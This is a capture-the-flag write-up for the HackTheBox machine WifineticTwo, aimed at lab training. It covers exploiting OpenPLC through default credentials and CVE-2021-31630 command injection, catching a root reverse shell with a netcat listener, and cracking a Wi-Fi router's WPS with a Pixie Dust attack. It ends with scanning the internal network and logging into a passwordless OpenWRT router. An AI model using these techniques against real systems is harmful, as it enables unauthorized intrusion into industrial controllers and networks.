WifineticTwo is a medium-difficulty machine from HackTheBox that provides the opportunity to exploit a vulnerable version OpenPLC server, scan a wireless network, exploit the AP to get the router password, connect to it and then pivot onto the Open-WRT Access Point. WifineticTwo-info-card
PS C:\Users\0xkujen> nmap -A-Pn10.129.75.3 Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-2711:58 W. Central Africa Standard Time NSOCK ERROR [0.2470s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for10.129.75.3 Host is up (0.42s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 307248add5b83a9fbcbef7e8201ef6bfdeae (RSA) | 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA) |_ 25618cd9d08a621a8b8b6f79f8d405154fb (ED25519) 8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18 | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0404 NOT FOUND | content-type: text/html; charset=utf-8 | content-length: 232 | vary: Cookie | set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqTTNQ.et7qGhPoRm1vSFs8pnh_t4_XhIs; Expires=Sat, 27-Jul-202411:05:05 GMT; HttpOnly; Path=/ | server: Werkzeug/1.0.1 Python/2.7.18 | date: Sat, 27 Jul 202411:00:05 GMT | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> | <title>404 Not Found</title> | <h1>Not Found</h1> | <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p> | GetRequest: | HTTP/1.0302 FOUND | content-type: text/html; charset=utf-8 | content-length: 219 | location: http://0.0.0.0:8080/login | vary: Cookie | set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZqTTMA.ZUdselS7Zc1Tv-oYIMJLOe-2JJs; Expires=Sat, 27-Jul-202411:05:00 GMT; HttpOnly; Path=/ | server: Werkzeug/1.0.1 Python/2.7.18 | date: Sat, 27 Jul 202411:00:00 GMT | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> | <title>Redirecting...</title> | <h1>Redirecting...</h1> | <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link. | HTTPOptions: | HTTP/1.0200 OK | content-type: text/html; charset=utf-8 | allow: HEAD, OPTIONS, GET | vary: Cookie | set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqTTMg.gxlsN0lxodwWIFcly8yD_bLvBgQ; Expires=Sat, 27-Jul-202411:05:02 GMT; HttpOnly; Path=/ | content-length: 0 | server: Werkzeug/1.0.1 Python/2.7.18 | date: Sat, 27 Jul 202411:00:02 GMT | RTSPRequest: | HTTP/1.1400 Bad request | content-length: 90 | cache-control: no-cache | content-type: text/html | connection: close | <html><body><h1>400 Bad request</h1> | Your browser sent an invalid request. |_ </body></html> | http-title: Site doesn't have a title (text/html; charset=utf-8). |_Requested resource was http://10.129.75.3:8080/login |_http-server-header: Werkzeug/1.0.1 Python/2.7.18 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : <snip>
We can see that we have OpenSSH running on port 22, and what seems to be a Python web app on port 8080.
Web application - 10.129.75.3:8080
Web App Port 8080
This is OpenPLC, an open-source Programmable Logic Controller that is based on an easy to use software. I instantly went over to google and searched for default credentials for OpenPLC: OpenPLC default credentials
Let’s try to login with those credentials: OpenPLC login
And we are in!! But before I go on and check for any interesting thing on the portal after logging in, I go ahead and check for any Vulnerabilities or CVEs for OpenPLC. OpenPLC CVE
CVE-2021-31630
I found this github repo with a Proof-of-concept for CVE-2021-31630 , which is a Command Injection vulnerability in Open PLC Webserver v3 that allows remote attackers to execute arbitrary code via the “Hardware Layer Code Box” component on the “/hardware” page of the application. Let’s clone the repo and exploit this vulnerbaility, it is pretty straight forward by specifying the OpenPLC default credentials:
PS C:\Users\0xkujen> nc -lvnp9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.75.3] 44484 bash: cannot set terminal processgroup (171): Inappropriate ioctl for device bash: no job control in this shell root@attica02:/opt/PLC/OpenPLC_v3/webserver# id id uid=0(root) gid=0(root) groups=0(root) root@attica02:/opt/PLC/OpenPLC_v3/webserver#
And we are root on this linux machine. Usually on HackTheBox, when you are root user after the first foothold directly, it would mean that most probably there is another machine still to be exploited, we confirm this by going to our root directory and getting the user.txt flag:
The wlan0 interface is up and ready to be used but is not currently connected to a Wi-Fi network. To activate and connect this interface, you would typically use a network management tool like NetworkManager, wpa_supplicant, or nmcli to connect to a Wi-Fi network, which would then assign an IP address and allow traffic to flow through the interface.
So our objective now is to be able to connect ourselves to the wifi network, but for that we’ll need the Access Point’s password, since we have its’ name ``plcrouter.
After a lot of thoughts on this, I tried performing the Pixie Dust attack attack - in order to acquire the Wifi’s Password- which works by bruteforcing the key for a protocol called WPS. WPS was intended to make accessing a router easier, and it did - for attackers. (lol) You can read more about it here .
So now we are connected to Wifi and have a proper IP address. It is safe to assume that the router’s IP Address is 192.168.1.1
let’s check for available machines locally first:
1 2 3
root@attica02:/opt/PLC/OpenPLC_v3/webserver# for ip in 192.168.1.{1..10}; do ping -c 1 -t 1 $ip > /dev/null && echo "${ip} is up"; done < 1 -t 1 $ip > /dev/null && echo"${ip} is up"; done 192.168.1.1 is up
And yes, 192.168.1.1 is up. Let’s upload a statically compiled nmap binary and check it out:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
root@attica02:~# ./nmap 192.168.1.1 ./nmap 192.168.1.1 Starting Nmap 7.91 ( https://nmap.org ) at 2024-07-27 17:02 UTC Unable to find nmap-services! Resorting to /etc/services Cannot find nmap-payloads. UDP payloads are disabled. Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed Nmap scan report for 192.168.1.1 Host is up (0.000024s latency). Not shown: 1152 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 443/tcp open https MAC Address: 02:00:00:00:01:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds root@attica02:~#
Judging from the LuCI - Lua Configuration Interface I can tell that this is an ``, we can cofirm this with a simple google search: OpenWRT router
I am a bit familiar with it, I’ll try to just ssh into the router and see what happens:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
root@attica02:~# ssh -o StrictHostKeyChecking=no [email protected] ssh -o StrictHostKeyChecking=no [email protected] Pseudo-terminal will not be allocated because stdin is not a terminal. Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts. _______ ________ __ | |.-----.-----.-----.| | | |.----.| |_ | - || _ | -__| || | | || _|| _| |_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M ----------------------------------------------------- OpenWrt 23.05.2, r23630-842932a63d ----------------------------------------------------- === WARNING! ===================================== There is no root password defined on this device! Use the "passwd"command to set up a new password in order to prevent unauthorized SSH logins. -------------------------------------------------- id uid=0(root) gid=0(root)
It appears that luckily the root user doesn’t have a password set on the router. And we get our root flag:
